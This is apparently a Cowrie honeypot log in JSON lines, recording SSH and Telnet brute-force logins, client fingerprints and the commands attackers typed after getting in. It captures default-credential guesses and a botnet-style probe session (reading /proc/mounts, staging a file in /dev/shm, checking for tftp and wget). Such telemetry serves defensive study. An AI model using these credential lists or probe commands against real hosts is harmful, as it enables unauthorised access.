{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:45:42.935890Z","src_ip":"194.233.79.134","session":"6d75c13a3af5"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:45:44.379925Z","src_ip":"194.233.79.134","session":"6d75c13a3af5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":10998,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4777fa06438","protocol":"ssh","message":"New connection: 45.125.211.194:10998 (1.2.3.4:22) [session: e4777fa06438]","sensor":"my-vps","timestamp":"2025-08-28T02:45:59.643131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:45:59.644652Z","src_ip":"45.125.211.194","session":"e4777fa06438"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T02:45:59.852293Z","src_ip":"45.125.211.194","session":"e4777fa06438"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:46:07.643527Z","src_ip":"45.125.211.194","session":"e4777fa06438"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64882,"dst_ip":"1.2.3.4","dst_port":23,"session":"9dcf8b53167b","protocol":"telnet","message":"New connection: 212.227.235.229:64882 (1.2.3.4:23) [session: 9dcf8b53167b]","sensor":"my-vps","timestamp":"2025-08-28T02:46:17.422951Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T02:46:18.223000Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1234","message":"login attempt [administrator/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:46:19.019164Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.login.success","username":"root","password":"pass","message":"login attempt [root/pass] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:46:19.819055Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:46:19.835689Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.088898Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.090630Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.091455Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.092768Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.093719Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.094554Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox HZICM","message":"CMD: cat /proc/mounts; /bin/busybox HZICM","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.348528Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HZICM","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HZICM","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.605893Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox HZICM","message":"CMD: tftp; wget; /bin/busybox HZICM","sensor":"my-vps","timestamp":"2025-08-28T02:46:20.861089Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.118048Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.120519Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"/bin/busybox HZICM","message":"CMD: /bin/busybox HZICM","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.374703Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.376876Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.378422Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.379299Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/275e8cada5185fd2acaa99f88b5ab2c7ef73b5ddca864cbdb9dc0fc4c8caf306","size":3550,"shasum":"275e8cada5185fd2acaa99f88b5ab2c7ef73b5ddca864cbdb9dc0fc4c8caf306","duplicate":false,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/275e8cada5185fd2acaa99f88b5ab2c7ef73b5ddca864cbdb9dc0fc4c8caf306 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.380748Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.session.closed","duration":3.9609012603759766,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:46:21.383754Z","src_ip":"212.227.235.229","session":"9dcf8b53167b"}
{"eventid":"cowrie.session.connect","src_ip":"31.214.172.54","src_port":41734,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe23576d1089","protocol":"ssh","message":"New connection: 31.214.172.54:41734 (1.2.3.4:22) [session: fe23576d1089]","sensor":"my-vps","timestamp":"2025-08-28T02:47:05.383933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:47:05.538387Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T02:47:05.539158Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.login.success","username":"root","password":"123123123","message":"login attempt [root/123123123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:47:06.460340Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":33156,"dst_ip":"1.2.3.4","dst_port":22,"session":"70c604087639","protocol":"ssh","message":"New connection: 194.233.79.134:33156 (1.2.3.4:22) [session: 70c604087639]","sensor":"my-vps","timestamp":"2025-08-28T02:47:13.903506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:47:13.912095Z","src_ip":"194.233.79.134","session":"70c604087639"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":39204,"dst_ip":"1.2.3.4","dst_port":22,"session":"6574acb8d876","protocol":"ssh","message":"New connection: 139.19.117.131:39204 (1.2.3.4:22) [session: 6574acb8d876]","sensor":"my-vps","timestamp":"2025-08-28T02:47:13.948391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:47:13.949115Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T02:47:13.967036Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-08-28T02:47:14.004340Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:47:14.004909Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-08-28T02:47:14.023708Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:47:14.024371Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:47:14.530985Z","src_ip":"194.233.79.134","session":"70c604087639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3645,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdcc18523489","protocol":"ssh","message":"New connection: 212.227.125.160:3645 (1.2.3.4:22) [session: fdcc18523489]","sensor":"my-vps","timestamp":"2025-08-28T02:47:16.702676Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:16.703724Z","src_ip":"212.227.125.160","session":"fdcc18523489"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3904,"dst_ip":"1.2.3.4","dst_port":22,"session":"f70289704a4a","protocol":"ssh","message":"New connection: 212.227.125.160:3904 (1.2.3.4:22) [session: f70289704a4a]","sensor":"my-vps","timestamp":"2025-08-28T02:47:16.813099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:47:16.813755Z","src_ip":"212.227.125.160","session":"f70289704a4a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T02:47:16.927121Z","src_ip":"212.227.125.160","session":"f70289704a4a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T02:47:16.941393Z","src_ip":"194.233.79.134","session":"70c604087639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52890,"dst_ip":"1.2.3.4","dst_port":23,"session":"953c1a53fe37","protocol":"telnet","message":"New connection: 212.227.125.160:52890 (1.2.3.4:23) [session: 953c1a53fe37]","sensor":"my-vps","timestamp":"2025-08-28T02:47:17.011955Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:47:17.155954Z","src_ip":"212.227.125.160","session":"953c1a53fe37"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:47:17.267108Z","src_ip":"212.227.125.160","session":"f70289704a4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T02:47:17.381010Z","session":"f70289704a4a"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T02:47:18.341444Z","src_ip":"212.227.125.160","session":"953c1a53fe37"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:18.525121Z","src_ip":"194.233.79.134","session":"70c604087639"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51192,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c78818b674d","protocol":"ssh","message":"New connection: 217.72.205.35:51192 (1.2.3.4:22) [session: 1c78818b674d]","sensor":"my-vps","timestamp":"2025-08-28T02:47:19.371996Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:19.373143Z","src_ip":"217.72.205.35","session":"1c78818b674d"}
{"eventid":"cowrie.session.closed","duration":3.9035701751708984,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:20.915432Z","src_ip":"212.227.125.160","session":"953c1a53fe37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52922,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff67b8adfacd","protocol":"telnet","message":"New connection: 212.227.125.160:52922 (1.2.3.4:23) [session: ff67b8adfacd]","sensor":"my-vps","timestamp":"2025-08-28T02:47:20.953592Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:47:21.061622Z","src_ip":"212.227.125.160","session":"ff67b8adfacd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:47:21.145407Z","src_ip":"212.227.125.160","session":"ff67b8adfacd"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T02:47:21.235667Z","src_ip":"212.227.125.160","session":"ff67b8adfacd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:22.311093Z","src_ip":"212.227.125.160","session":"ff67b8adfacd"}
{"eventid":"cowrie.session.closed","duration":1.3633227348327637,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:22.316845Z","src_ip":"212.227.125.160","session":"ff67b8adfacd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54432,"dst_ip":"1.2.3.4","dst_port":23,"session":"4929502ad9ef","protocol":"telnet","message":"New connection: 212.227.235.229:54432 (1.2.3.4:23) [session: 4929502ad9ef]","sensor":"my-vps","timestamp":"2025-08-28T02:47:23.159586Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:23.948528Z","src_ip":"139.19.117.131","session":"6574acb8d876"}
